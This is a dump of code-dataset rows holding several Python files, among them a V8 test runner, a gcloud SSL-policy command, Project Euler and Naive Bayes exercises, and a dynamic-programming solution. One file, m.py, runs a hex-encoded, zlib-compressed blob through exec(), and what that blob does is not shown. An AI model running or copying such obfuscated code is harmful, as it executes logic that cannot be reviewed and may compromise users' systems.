blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
261
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
45
| license_type
stringclasses 2
values | repo_name
stringlengths 8
111
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 72
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 530k
616M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
24.6k
| gha_license_id
stringclasses 9
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 40
values | src_encoding
stringclasses 10
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 2
classes | length_bytes
int64 11
4.05M
| extension
stringclasses 25
values | content
stringlengths 10
4.04M
| authors
sequencelengths 1
1
| author_id
stringclasses 578
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4f659d9fc0303fc1ebfcc69527ae63585c957b79 | e397e996e6ecbda3742980352f8642dfb058fbdb | /src/nodescripts/corenodes/blend/__init__.py | e7c9684c39899c9ddf33aec8b393b96d49b08834 | [
"Apache-2.0"
] | permissive | dephora/GimelStudio | bdcac2155b0021af0a60df4ed4df045a86353ab7 | 0cdaed3ffa93fd735ca8d65a0d99f1be64c2c522 | refs/heads/master | 2023-08-13T02:53:46.269443 | 2021-10-08T15:35:39 | 2021-10-08T15:35:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | from .mix_node import MixNode
from .alpha_over_node import AlphaOverNode | [
"[email protected]"
] | |
0b697bf8ee814996d74fb061231aeabb70a184c9 | 70fa6468c768d4ec9b4b14fc94fa785da557f1b5 | /lib/surface/compute/ssl_policies/describe.py | 0546d3f6604bd3a747040e4520dae448783faf92 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | kylewuolle/google-cloud-sdk | d43286ef646aec053ecd7eb58566ab2075e04e76 | 75f09ebe779e99fdc3fd13b48621fe12bfaa11aa | refs/heads/master | 2020-04-20T22:10:41.774132 | 2019-01-26T09:29:26 | 2019-01-26T09:29:26 | 169,131,028 | 0 | 0 | NOASSERTION | 2019-02-04T19:04:40 | 2019-02-04T18:58:36 | Python | UTF-8 | Python | false | false | 2,150 | py | # -*- coding: utf-8 -*- #
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command to describe SSL policies."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute.ssl_policies import ssl_policies_utils
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.ssl_policies import flags
_SSL_POLICY_ARG = flags.GetSslPolicyArgument()
class Describe(base.DescribeCommand):
"""Describe a Google Compute Engine ssl policy.
*{command}* is used to display all data associated with a Google Compute
Engine SSL policy in a project.
An SSL policy specifies the server-side support for SSL features. An SSL
policy can be attached to a TargetHttpsProxy or a TargetSslProxy. This affects
connections between clients and the HTTPS or SSL proxy load balancer. SSL
policies do not affect the connection between the load balancers and the
backends.
"""
@staticmethod
def Args(parser):
_SSL_POLICY_ARG.AddArgument(parser, operation_type='describe')
def Run(self, args):
"""Issues the request to describe a SSL policy."""
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
helper = ssl_policies_utils.SslPolicyHelper(holder)
ref = _SSL_POLICY_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
return helper.Describe(ref)
| [
"[email protected]"
] | |
6dd2391b1a566786d194913b72e160c7c445f124 | 79f6873839b54a21dff11ceeef5160e7b9330864 | /Project Euler/009.py | 4ebd2beb7a9bb309da5bd351727beba8a2474343 | [] | no_license | paperwraith/Project_Euler | 45c0890a8e42d0277712da8289972c4d2542c663 | 07d27231f0137bee0b419e5474173ef086ae529e | refs/heads/main | 2023-08-11T14:10:39.373972 | 2021-09-25T23:11:42 | 2021-09-25T23:11:42 | 410,400,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | # A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
# a^2 + b^2 = c^2
# For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.
# There exists exactly one Pythagorean triplet for which a + b + c = 1000.
# Find the product abc.
# TODO:
# Generate Triples
# Check if sum of triples equals 1000
def triple_gen():
m = 2
n = 1
| [
"[email protected]"
] | |
1433ed9a66cf8f030d0107507d432670a7d51f0f | 58baf0dd6a9aa51ef5a7cf4b0ee74c9cb0d2030f | /tools/testrunner/standard_runner.py | a59fe0839665fe1699fff41e3e9e4b837c952af2 | [
"bzip2-1.0.6",
"BSD-3-Clause",
"SunPro"
] | permissive | eachLee/v8 | cce8d6e620625c97a2e969ee8a52cc5eb77444ce | 1abeb0caa21301f5ace7177711c4f09f2d6447d9 | refs/heads/master | 2021-08-14T08:21:44.549890 | 2017-11-14T20:35:38 | 2017-11-14T23:06:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,667 | py | #!/usr/bin/env python
#
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from collections import OrderedDict
from os.path import join
import multiprocessing
import os
import random
import shlex
import subprocess
import sys
import time
# Adds testrunner to the path hence it has to be imported at the beggining.
import base_runner
from testrunner.local import execution
from testrunner.local import progress
from testrunner.local import testsuite
from testrunner.local import utils
from testrunner.local import verbose
from testrunner.local.variants import ALL_VARIANTS
from testrunner.objects import context
TIMEOUT_DEFAULT = 60
# Variants ordered by expected runtime (slowest first).
VARIANTS = ["default"]
MORE_VARIANTS = [
"stress",
"stress_incremental_marking",
"nooptimization",
"stress_asm_wasm",
"wasm_traps",
]
EXHAUSTIVE_VARIANTS = MORE_VARIANTS + VARIANTS
VARIANT_ALIASES = {
# The default for developer workstations.
"dev": VARIANTS,
# Additional variants, run on all bots.
"more": MORE_VARIANTS,
# TODO(machenbach): Deprecate this after the step is removed on infra side.
# Additional variants, run on a subset of bots.
"extra": [],
}
GC_STRESS_FLAGS = ["--gc-interval=500", "--stress-compaction",
"--concurrent-recompilation-queue-length=64",
"--concurrent-recompilation-delay=500",
"--concurrent-recompilation"]
# Double the timeout for these:
SLOW_ARCHS = ["arm",
"mips",
"mipsel",
"mips64",
"mips64el",
"s390",
"s390x",
"arm64"]
class StandardTestRunner(base_runner.BaseTestRunner):
def __init__(self):
super(StandardTestRunner, self).__init__()
self.sancov_dir = None
def _do_execute(self, options, args):
if options.swarming:
# Swarming doesn't print how isolated commands are called. Lets make
# this less cryptic by printing it ourselves.
print ' '.join(sys.argv)
if utils.GuessOS() == "macos":
# TODO(machenbach): Temporary output for investigating hanging test
# driver on mac.
print "V8 related processes running on this host:"
try:
print subprocess.check_output(
"ps -e | egrep 'd8|cctest|unittests'", shell=True)
except Exception:
pass
suite_paths = utils.GetSuitePaths(join(base_runner.BASE_DIR, "test"))
# Use default tests if no test configuration was provided at the cmd line.
if len(args) == 0:
args = ["default"]
# Expand arguments with grouped tests. The args should reflect the list
# of suites as otherwise filters would break.
def ExpandTestGroups(name):
if name in base_runner.TEST_MAP:
return [suite for suite in base_runner.TEST_MAP[name]]
else:
return [name]
args = reduce(lambda x, y: x + y,
[ExpandTestGroups(arg) for arg in args],
[])
args_suites = OrderedDict() # Used as set
for arg in args:
args_suites[arg.split('/')[0]] = True
suite_paths = [ s for s in args_suites if s in suite_paths ]
suites = []
for root in suite_paths:
suite = testsuite.TestSuite.LoadTestSuite(
os.path.join(base_runner.BASE_DIR, "test", root))
if suite:
suites.append(suite)
for s in suites:
s.PrepareSources()
try:
return self._execute(args, options, suites)
except KeyboardInterrupt:
return 2
def _add_parser_options(self, parser):
parser.add_option("--sancov-dir",
help="Directory where to collect coverage data")
parser.add_option("--cfi-vptr",
help="Run tests with UBSAN cfi_vptr option.",
default=False, action="store_true")
parser.add_option("--novfp3",
help="Indicates that V8 was compiled without VFP3"
" support",
default=False, action="store_true")
parser.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
parser.add_option("--slow-tests",
help="Regard slow tests (run|skip|dontcare)",
default="dontcare")
parser.add_option("--pass-fail-tests",
help="Regard pass|fail tests (run|skip|dontcare)",
default="dontcare")
parser.add_option("--gc-stress",
help="Switch on GC stress mode",
default=False, action="store_true")
parser.add_option("--command-prefix",
help="Prepended to each shell command used to run a"
" test",
default="")
parser.add_option("--extra-flags",
help="Additional flags to pass to each test command",
action="append", default=[])
parser.add_option("--isolates", help="Whether to test isolates",
default=False, action="store_true")
parser.add_option("-j", help="The number of parallel tasks to run",
default=0, type="int")
parser.add_option("--no-harness", "--noharness",
help="Run without test harness of a given suite",
default=False, action="store_true")
parser.add_option("--no-presubmit", "--nopresubmit",
help='Skip presubmit checks (deprecated)',
default=False, dest="no_presubmit", action="store_true")
parser.add_option("--no-sorting", "--nosorting",
help="Don't sort tests according to duration of last"
" run.",
default=False, dest="no_sorting", action="store_true")
parser.add_option("--no-variants", "--novariants",
help="Don't run any testing variants",
default=False, dest="no_variants", action="store_true")
parser.add_option("--variants",
help="Comma-separated list of testing variants;"
" default: \"%s\"" % ",".join(VARIANTS))
parser.add_option("--exhaustive-variants",
default=False, action="store_true",
help="Use exhaustive set of default variants:"
" \"%s\"" % ",".join(EXHAUSTIVE_VARIANTS))
parser.add_option("-p", "--progress",
help=("The style of progress indicator"
" (verbose, dots, color, mono)"),
choices=progress.PROGRESS_INDICATORS.keys(),
default="mono")
parser.add_option("--quickcheck", default=False, action="store_true",
help=("Quick check mode (skip slow tests)"))
parser.add_option("--report", help="Print a summary of the tests to be"
" run",
default=False, action="store_true")
parser.add_option("--json-test-results",
help="Path to a file for storing json results.")
parser.add_option("--flakiness-results",
help="Path to a file for storing flakiness json.")
parser.add_option("--rerun-failures-count",
help=("Number of times to rerun each failing test case."
" Very slow tests will be rerun only once."),
default=0, type="int")
parser.add_option("--rerun-failures-max",
help="Maximum number of failing test cases to rerun.",
default=100, type="int")
parser.add_option("--shard-count",
help="Split testsuites into this number of shards",
default=1, type="int")
parser.add_option("--shard-run",
help="Run this shard from the split up tests.",
default=1, type="int")
parser.add_option("--dont-skip-slow-simulator-tests",
help="Don't skip more slow tests when using a"
" simulator.",
default=False, action="store_true",
dest="dont_skip_simulator_slow_tests")
parser.add_option("--swarming",
help="Indicates running test driver on swarming.",
default=False, action="store_true")
parser.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
parser.add_option("-t", "--timeout", help="Timeout in seconds",
default=TIMEOUT_DEFAULT, type="int")
parser.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
parser.add_option("--junitout", help="File name of the JUnit output")
parser.add_option("--junittestsuite",
help="The testsuite name in the JUnit output file",
default="v8tests")
parser.add_option("--random-seed", default=0, dest="random_seed",
help="Default seed for initializing random generator",
type=int)
parser.add_option("--random-seed-stress-count", default=1, type="int",
dest="random_seed_stress_count",
help="Number of runs with different random seeds")
def _process_options(self, options):
global VARIANTS
if options.sancov_dir:
self.sancov_dir = options.sancov_dir
if not os.path.exists(self.sancov_dir):
print("sancov-dir %s doesn't exist" % self.sancov_dir)
raise base_runner.TestRunnerError()
options.command_prefix = shlex.split(options.command_prefix)
options.extra_flags = sum(map(shlex.split, options.extra_flags), [])
if options.gc_stress:
options.extra_flags += GC_STRESS_FLAGS
if self.build_config.asan:
options.extra_flags.append("--invoke-weak-callbacks")
options.extra_flags.append("--omit-quit")
if options.novfp3:
options.extra_flags.append("--noenable-vfp3")
if options.exhaustive_variants:
# This is used on many bots. It includes a larger set of default
# variants.
# Other options for manipulating variants still apply afterwards.
VARIANTS = EXHAUSTIVE_VARIANTS
# TODO(machenbach): Figure out how to test a bigger subset of variants on
# msan.
if self.build_config.msan:
VARIANTS = ["default"]
if options.j == 0:
options.j = multiprocessing.cpu_count()
if options.random_seed_stress_count <= 1 and options.random_seed == 0:
options.random_seed = self._random_seed()
def excl(*args):
"""Returns true if zero or one of multiple arguments are true."""
return reduce(lambda x, y: x + y, args) <= 1
if not excl(options.no_variants, bool(options.variants)):
print("Use only one of --no-variants or --variants.")
raise base_runner.TestRunnerError()
if options.quickcheck:
VARIANTS = ["default", "stress"]
options.slow_tests = "skip"
options.pass_fail_tests = "skip"
if options.no_variants:
VARIANTS = ["default"]
if options.variants:
VARIANTS = options.variants.split(",")
# Resolve variant aliases.
VARIANTS = reduce(
list.__add__,
(VARIANT_ALIASES.get(v, [v]) for v in VARIANTS),
[],
)
if not set(VARIANTS).issubset(ALL_VARIANTS):
print "All variants must be in %s" % str(ALL_VARIANTS)
raise base_runner.TestRunnerError()
if self.build_config.predictable:
VARIANTS = ["default"]
options.extra_flags.append("--predictable")
options.extra_flags.append("--verify_predictable")
options.extra_flags.append("--no-inline-new")
# Dedupe.
VARIANTS = list(set(VARIANTS))
def CheckTestMode(name, option):
if not option in ["run", "skip", "dontcare"]:
print "Unknown %s mode %s" % (name, option)
raise base_runner.TestRunnerError()
CheckTestMode("slow test", options.slow_tests)
CheckTestMode("pass|fail test", options.pass_fail_tests)
if self.build_config.no_i18n:
base_runner.TEST_MAP["bot_default"].remove("intl")
base_runner.TEST_MAP["default"].remove("intl")
def _setup_env(self):
super(StandardTestRunner, self)._setup_env()
symbolizer_option = self._get_external_symbolizer_option()
if self.sancov_dir:
os.environ['ASAN_OPTIONS'] = ":".join([
'coverage=1',
'coverage_dir=%s' % self.sancov_dir,
symbolizer_option,
"allow_user_segv_handler=1",
])
def _random_seed(self):
seed = 0
while not seed:
seed = random.SystemRandom().randint(-2147483648, 2147483647)
return seed
def _execute(self, args, options, suites):
print(">>> Running tests for %s.%s" % (self.build_config.arch,
self.mode_name))
# Populate context object.
# Simulators are slow, therefore allow a longer timeout.
if self.build_config.arch in SLOW_ARCHS:
options.timeout *= 2
options.timeout *= self.mode_options.timeout_scalefactor
if self.build_config.predictable:
# Predictable mode is slower.
options.timeout *= 2
ctx = context.Context(self.build_config.arch,
self.mode_options.execution_mode,
self.outdir,
self.mode_options.flags,
options.verbose,
options.timeout,
options.isolates,
options.command_prefix,
options.extra_flags,
self.build_config.no_i18n,
options.random_seed,
options.no_sorting,
options.rerun_failures_count,
options.rerun_failures_max,
self.build_config.predictable,
options.no_harness,
use_perf_data=not options.swarming,
sancov_dir=self.sancov_dir)
# TODO(all): Combine "simulator" and "simulator_run".
# TODO(machenbach): In GN we can derive simulator run from
# target_arch != v8_target_arch in the dumped build config.
simulator_run = (
not options.dont_skip_simulator_slow_tests and
self.build_config.arch in [
'arm64', 'arm', 'mipsel', 'mips', 'mips64', 'mips64el', 'ppc',
'ppc64', 's390', 's390x'] and
bool(base_runner.ARCH_GUESS) and
self.build_config.arch != base_runner.ARCH_GUESS)
# Find available test suites and read test cases from them.
variables = {
"arch": self.build_config.arch,
"asan": self.build_config.asan,
"byteorder": sys.byteorder,
"dcheck_always_on": self.build_config.dcheck_always_on,
"deopt_fuzzer": False,
"gc_fuzzer": False,
"gc_stress": options.gc_stress,
"gcov_coverage": self.build_config.gcov_coverage,
"isolates": options.isolates,
"mode": self.mode_options.status_mode,
"msan": self.build_config.msan,
"no_harness": options.no_harness,
"no_i18n": self.build_config.no_i18n,
"no_snap": self.build_config.no_snap,
"novfp3": options.novfp3,
"predictable": self.build_config.predictable,
"simulator": utils.UseSimulator(self.build_config.arch),
"simulator_run": simulator_run,
"system": utils.GuessOS(),
"tsan": self.build_config.tsan,
"ubsan_vptr": self.build_config.ubsan_vptr,
}
all_tests = []
num_tests = 0
for s in suites:
s.ReadStatusFile(variables)
s.ReadTestCases(ctx)
if len(args) > 0:
s.FilterTestCasesByArgs(args)
all_tests += s.tests
# First filtering by status applying the generic rules (independent of
# variants).
s.FilterTestCasesByStatus(options.warn_unused, options.slow_tests,
options.pass_fail_tests)
if options.cat:
verbose.PrintTestSource(s.tests)
continue
variant_gen = s.CreateVariantGenerator(VARIANTS)
variant_tests = [ t.CopyAddingFlags(v, flags)
for t in s.tests
for v in variant_gen.FilterVariantsByTest(t)
for flags in variant_gen.GetFlagSets(t, v) ]
if options.random_seed_stress_count > 1:
# Duplicate test for random seed stress mode.
def iter_seed_flags():
for _ in range(0, options.random_seed_stress_count):
# Use given random seed for all runs (set by default in
# execution.py) or a new random seed if none is specified.
if options.random_seed:
yield []
else:
yield ["--random-seed=%d" % self._random_seed()]
s.tests = [
t.CopyAddingFlags(t.variant, flags)
for t in variant_tests
for flags in iter_seed_flags()
]
else:
s.tests = variant_tests
# Second filtering by status applying the variant-dependent rules.
s.FilterTestCasesByStatus(options.warn_unused, options.slow_tests,
options.pass_fail_tests, variants=True)
s.tests = self._shard_tests(s.tests, options)
num_tests += len(s.tests)
if options.cat:
return 0 # We're done here.
if options.report:
verbose.PrintReport(all_tests)
# Run the tests.
start_time = time.time()
progress_indicator = progress.IndicatorNotifier()
progress_indicator.Register(
progress.PROGRESS_INDICATORS[options.progress]())
if options.junitout:
progress_indicator.Register(progress.JUnitTestProgressIndicator(
options.junitout, options.junittestsuite))
if options.json_test_results:
progress_indicator.Register(progress.JsonTestProgressIndicator(
options.json_test_results,
self.build_config.arch,
self.mode_options.execution_mode,
ctx.random_seed))
if options.flakiness_results:
progress_indicator.Register(progress.FlakinessTestProgressIndicator(
options.flakiness_results))
runner = execution.Runner(suites, progress_indicator, ctx)
exit_code = runner.Run(options.j)
overall_duration = time.time() - start_time
if options.time:
verbose.PrintTestDurations(suites, overall_duration)
if num_tests == 0:
print("Warning: no tests were run!")
if exit_code == 1 and options.json_test_results:
print("Force exit code 0 after failures. Json test results file "
"generated with failure information.")
exit_code = 0
if self.sancov_dir:
# If tests ran with sanitizer coverage, merge coverage files in the end.
try:
print "Merging sancov files."
subprocess.check_call([
sys.executable,
join(
base_runner.BASE_DIR, "tools", "sanitizers", "sancov_merger.py"),
"--coverage-dir=%s" % self.sancov_dir])
except:
print >> sys.stderr, "Error: Merging sancov files failed."
exit_code = 1
return exit_code
def _shard_tests(self, tests, options):
# Read gtest shard configuration from environment (e.g. set by swarming).
# If none is present, use values passed on the command line.
shard_count = int(
os.environ.get('GTEST_TOTAL_SHARDS', options.shard_count))
shard_run = os.environ.get('GTEST_SHARD_INDEX')
if shard_run is not None:
# The v8 shard_run starts at 1, while GTEST_SHARD_INDEX starts at 0.
shard_run = int(shard_run) + 1
else:
shard_run = options.shard_run
if options.shard_count > 1:
# Log if a value was passed on the cmd line and it differs from the
# environment variables.
if options.shard_count != shard_count:
print("shard_count from cmd line differs from environment variable "
"GTEST_TOTAL_SHARDS")
if options.shard_run > 1 and options.shard_run != shard_run:
print("shard_run from cmd line differs from environment variable "
"GTEST_SHARD_INDEX")
if shard_count < 2:
return tests
if shard_run < 1 or shard_run > shard_count:
print "shard-run not a valid number, should be in [1:shard-count]"
print "defaulting back to running all tests"
return tests
count = 0
shard = []
for test in tests:
if count % shard_count == shard_run - 1:
shard.append(test)
count += 1
return shard
if __name__ == '__main__':
sys.exit(StandardTestRunner().execute())
| [
"[email protected]"
] | |
ad8ace3d9d368e692a32a964c2ad9c4e137f94dd | 474b53e2dfbecab16d92fc44e8246b44fa2d840b | /NaiveBayes_Titanic/NaiveBayesTitanic.py | af1366cf7a34b0eeda5db147f20bb21ac4da3be2 | [] | no_license | YYJIANG/classPatternRecognition | db98493b53f28149ad3b828a8e0cd95e6c0e0920 | 093dfd9d0a80abb126e73a8c3de8ff74d3e49699 | refs/heads/main | 2023-08-27T10:40:06.280524 | 2021-10-28T01:23:36 | 2021-10-28T01:23:36 | 413,449,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,097 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 4 16:15:26 2021
@author: JYY
"""
import csv
import numpy as np
def dataProcess(filename='train.csv',a=0,b=1,c=4,d=5):
'''读取csv文件'''
train_data = []
with open(filename,'r',newline='') as f:
csvreader = csv.reader(f)
for line in csvreader:
train_data.append(line)
'''将所需的特征重组成矩阵。每行为一个乘客,每列为乘客信息(编号,存活,性别,年龄)'''
train = []
male_age = female_age = 0
male_num = female_num = 0
for i in range(len(train_data)-1):
train_row= []
train_row.append(eval(train_data[i+1][a]))
train_row.append(eval(train_data[i+1][b]))
train_row.append(1 if train_data[i+1][c]=='male' else 0)
age = train_data[i+1][d]
if age.isdigit():
train_row.append(eval(age))
if train_row[2] == 1:
male_num += 1
male_age += eval(age)
else:
female_num += 1
female_age += eval(age)
else:
train_row.append(-1)
train.append(train_row)
male_age = male_age/male_num
female_age = female_age/female_num
'''年龄————0(0~5)——1(6-15)——2(16-25)——3(26-35)——4(35-45)——5(45-...),默认3'''
for i in range(len(train)):
if train[i][3] == -1:
train[i][3] = 3
elif train[i][3] <=5:
train[i][3] = 0
elif train[i][3] <=15:
train[i][3] =1
elif train[i][3] <= 25:
train[i][3] = 2
elif train[i][3] <=35:
train[i][3] =3
elif train[i][3] <=45:
train[i][3] = 4
else:
train[i][3] = 5
return train
'''导入训练数据'''
train = dataProcess('train.csv',0,1,4,5)
'''计算先验概率和条件概率'''
sur = np.zeros(2)
sur_sex = np.zeros([2,2])
sur_age = np.zeros([2,6])
'''死——活''''''死——活————性别0~1''''''死——活————年龄0~6'''
for i in range(len(train)):
sur[train[i][1]] += 1
sur_sex[train[i][1]][train[i][2]] += 1
sur_age[train[i][1]][train[i][3]] += 1
sur = sur/sur.sum()
for i in range(2):
sur_sex[i] = sur_sex[i]/sur_sex[i].sum()
sur_age[i] = sur_age[i]/sur_age[i].sum()
print(sur)
print(sur_sex)
print(sur_age)
'''导入测试数据'''
test = dataProcess('test.csv',0,0,3,4)
''' '''
pre = []
for i in range(len(test)):
precision_row = [str(test[i][0])]
p_sur_0 = sur[0]*sur_sex[0][test[i][2]]*sur_age[0][test[i][3]]
p_sur_1 = sur[1]*sur_sex[1][test[i][2]]*sur_age[1][test[i][3]]
precision_row.append('0' if p_sur_0 > p_sur_1 else '1')
pre.append(precision_row)
print(pre)
with open('precision.csv','w',newline='') as f:
csvwriter=csv.writer(f)
csvwriter.writerow(['PassengerId','Survived'])
csvwriter.writerows(pre)
# print(train) | [
"[email protected]"
] | |
c81f32fd9551171eca3f5765147895606e3573ff | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2759/60610/245707.py | 0d1aca295915e41bef3bdf5a5262c94f0f29f52f | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | num=input();
for i in range(num):
string=raw_input();
numList=string.split();
count=0
for j in range(int(numList[0]),int(numList[1])+1):
a=int(numList[2]);
b=int(numList[3]);
if (j%a==0) | (j%b==0):
count+=1;
print(count); | [
"[email protected]"
] | |
2af082e346df1acaa0004afb1d856e2c49d3ee69 | 6ac0b1f627976e7fcf69d41b723e155a01d689ce | /m.py | e14330dc53678e40d61224761ef1ec6a03c6b378 | [] | no_license | MrFaxel/Sec | 954ad750284fe6e33e820e6fb8f2a51941c14d3e | bf7746ab6199f8d746a1c6197b44f982aad01224 | refs/heads/master | 2022-12-04T12:32:57.340518 | 2020-09-02T22:41:40 | 2020-09-02T22:41:40 | 292,390,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,268 | py | #Compiler par Faxel
#Twitter https://twitter.com/Faxel2020
import zlib , marshal , base64
from base64 import *
exec(zlib.decompress(base64.b16decode('789CCD574B6FE33610BE1BF07F983A073B8B95B3B637ED26410EC576736A4F057A4916022D535E1614A925A9D42E7A29F6984B0BD82850A0A71E8B6C5CF4987FE35FD2A19E9622BF80855B82B0257238CF6F469CA3CF4E22AD4E864C9C8453F34E8A41B371E4C91113E3CBC8F8CE2B7CDD36E0B5A22366346CA55C3B500A7C4DC18B19412823051EBECA11855B0204BE51704526945BBA6F19DCCA48DB1F4E7F845051315274DDF1EFE41489AE883654C197C8A2BB83459F60341B5C8EA5EB5BADE1B2D36AB56E5E0C06D7835717A717FD975F04CBF9FD72F6F372FE71E5E16F9C2B54BD971955323392BA798FBB37A22262F6C1CEF962397FC89E6B44D8E54C0A12AE131133A81311CB4E7F677F268AD688586486FC533CA4D6E72B7FAD11519956D6C3062B904FAECEFCCECE98F33E22625F3D1591B9B0B0BB568475F9D3702481C87F678F89BBAB115FAC44A1421B3FA4363E26F142601DA758D3D44B9136E90DAF7B1783FEEEF82901A9B2585610F6C564A14C1E23EBB70F3B689278EBE32665F6446F59993A4CD682D38638C1F85DA6CFFD1398C3BE385F09D3A2F0670AC00CC619FD0AF6EFCA2B99751B3CB34346D478262F1B39AA0B783F9473655110C45B35CAEC993B35CEC961BFEEA194238F457DAD560BD837CBCAFA6C4DA23578CE9DF309B8E5807948EB4CEFE2CCD698D972FECBFF63FE5656ECD7ECA5175C678F83E0D9B362F96D11A4B3D300E2F115BDA55C8621C54F7AC1EDBC12CEE47200C5D85156AE5A49D3DFFF6BCFE5F38FA4BA1FE6BE7204CE1BDF271EDE9338053DC51B5340810A781F516D98140E12B12094CA80D4CF434E8C2F55D06C8CA80FAEC775E7F8BCD9B0DE673E127405C1E39797D016A69D6EC403B712E69D361E6A1F275B946BBA968A12D53E981F8C9A6676E4C61A16D0E7A84FB21E2A264CA79561A61FC09B091B53E1510D23A64329D89053DD4A4D4B7CD36CD0894743735E5EACE1F77900AFA5F0D93852C4FA1D147D1F314D938B2D6F33A10DE13CDEEBE228B07B23329985FB5A2434CE981A488F818A86533092715C4321F85773684C83FC0097DC23A66ACD618281504295BAB75469B4F6FAC55BD40ADAFDF65A2F16B7EE0C5813667D2B6E4C7D51A8AD09D8366087216297DFDA268368880CE31805955161894A5AA6FECAB938447442BDC8F61BD884684FB1D01414DDBD35A111E3B6D1E1ED9C2F26A521211106CA57CCB4854B607098001D42CA4A614FAA4D40BECF8BCD2A0456009C02DC41FC048114F2CCF6908EE3336E1D3826D3564DF2A58E3C0DEA32C2769611A683546C8C200CE296725F2E855A56A95E1F9C2B184A35A269830B3F55D22D659CBDDA42D4D59CD2B033386412BAAE2DE7AE6B0B7ACB7503C284EBB6D210C4E13818E02A31F1E2521987A6ABE890609D342AA271066C27F5097E77B6D1FAF83D137CBA81CC71C65C0E09DF48A2DFC91F9C043D87CBCF7F0100EAFB80'))) | [
"[email protected]"
] | |
c5c561e0a70c1027a7c149cd7ffb4e4f5bb38d0f | 9a9f31265c65bec0060271cd337580e7b4f3a7e9 | /project/pokupka.py | 81819a11dce3c4e08f65498d21c98238d72d5f98 | [] | no_license | AnatolyDomrachev/1kurs | efaabde4852172b61d3584237611fe19b9faa462 | 84ed0dceb670ec64c958bf1901636a02baf8f533 | refs/heads/master | 2023-02-19T21:42:53.286190 | 2021-01-19T07:41:15 | 2021-01-19T07:41:15 | 292,637,199 | 0 | 1 | null | 2020-09-16T02:29:14 | 2020-09-03T17:32:29 | Python | UTF-8 | Python | false | false | 586 | py | import magazin
import etc
magazin = magazin.Magazin('magazin.conf')
korzina = []
net_v_magazine = []
def pokupka(spisok):
for slovar in spisok:
est_v_mag = 'No'
for tovar in magazin.tovary:
if slovar['name'] == tovar['name']:
kupil = etc.beru(slovar, tovar)
korzina.append(kupil)
est_v_mag = 'Yes'
if est_v_mag == 'No':
print(slovar," нет в магазине")
print("Купили: ",korzina)
print()
print("Осталось: ",magazin.tovary)
| [
"[email protected]"
] | |
979286ffb46a102ab49df74f8383e498329ab818 | e5eec1428da1d24d3e9b86f5723c51cd2ca636cd | /dynamic_programming/백준/가장큰정사각형_백준.py | 4db92f7d4eee1a5199ea97cc10a52e85fa483fca | [] | no_license | jamwomsoo/Algorithm_prac | 3c36c381f59277721517d331a8f1640399d80c1d | 8393f3cc2f950214c47f3cf0b2c1271791f115d0 | refs/heads/master | 2023-06-09T06:49:14.739255 | 2021-06-18T06:41:01 | 2021-06-18T06:41:01 | 325,227,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | # 백준 DP 난이도 골드 5
# 전형적인 dp문제
# dp[i][j]는 위, 왼쪽, 대각선 위 중 작은 것중에 하나를 자신과 더한 값
# -> 정사각형이라면 변의 길이가 모두 같아야하므로
# 1 1 1 1 1 1
# 1 1 1 -> 1 2 2
# 1 1 1 1 2 3
n, m = map(int, input().split())
arr = []
dp = [[0]*(m+1) for _ in range(n+1)]
for i in range(n):
arr.append(list(map(int, input())))
for j in range(m):
dp[i+1][j+1] = arr[i][j]
for i in range(n+1):
for j in range(m+1):
if dp[i][j] != 0:
dp[i][j] += min(dp[i-1][j-1], dp[i][j-1], dp[i-1][j])
res = 0
for row in dp:
res = max(res, max(row))
print(res**2)
| [
"[email protected]"
] | |
